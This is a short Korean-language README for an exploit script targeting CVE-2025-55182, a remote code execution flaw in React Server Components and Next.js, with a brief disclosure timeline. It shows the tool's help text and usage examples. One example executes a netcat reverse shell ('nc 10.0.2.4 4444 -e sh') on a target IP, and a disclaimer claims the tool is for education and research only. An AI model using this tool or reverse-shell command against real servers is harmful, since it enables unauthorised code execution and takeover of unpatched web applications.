
CVE-2025-55182 익스플로잇 | infrar3d 제작
infrar3d에 의해 익스플로잇됨
React.js의 서버 측 사용에 영향을 미치는, 심각도(critical severity) 10.0의 취약점으로, React.js에서는 CVE-2025-55182로, Next.js 프레임워크에서는 CVE-2025-66478로 추적됩니다.
이 취약점은 2025년 11월 29일 PT에 Lachlan Davidson이 Meta 팀에 책임 있게 공개했습니다. 초기 공개 및 패치 릴리스는 2025년 12월 3일 PT에 React와 Vercel이 수행했습니다. (원본: https://react2shell.com/)
python3 CVE-2025-55182.py --help
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]
CVE-2025-55182 - React Server Components RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target URL (required)
-c, --command COMMAND
Command to execute on target (default: id)
Example: python CVE-2025-55182.py -u http://target.com -c "whoami"
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"
이 소프트웨어와 개념 증명(PoC) 코드는 교육 및 연구 목적으로만 제공됩니다.
귀하는 모든 관련 법률을 준수할 책임이 있습니다. 윤리적이고 책임감 있게 사용하십시오.